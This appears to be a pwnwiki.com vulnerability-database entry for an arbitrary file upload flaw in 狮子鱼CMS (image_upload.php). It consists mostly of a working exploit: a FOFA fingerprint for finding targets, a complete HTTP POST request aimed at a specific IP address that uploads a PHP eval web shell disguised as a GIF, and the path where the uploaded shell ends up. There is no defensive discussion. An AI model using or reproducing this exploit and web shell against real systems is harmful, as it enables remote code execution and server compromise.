Loading
0

狮子鱼CMS image upload.php 任意文件上传漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

FOFA

"/seller.php?s=/Public/login"

Request

POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/2
Host: 47.95.36.147
Content-Type: multipart/form-data;boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Length: 208

------WebKitFormBoundary8UaANmWAgM4BqBSs
Content-Disposition: form-data; name="files"; filename="test.php"
Content-Type: image/gif

<?php @eval($_POSTpq);?>
------WebKitFormBoundary8UaANmWAgM4BqBSs—

设置返回文件路径

/Common/image/uploads/xxxxx.php

免费、自由、人人可编辑的漏洞库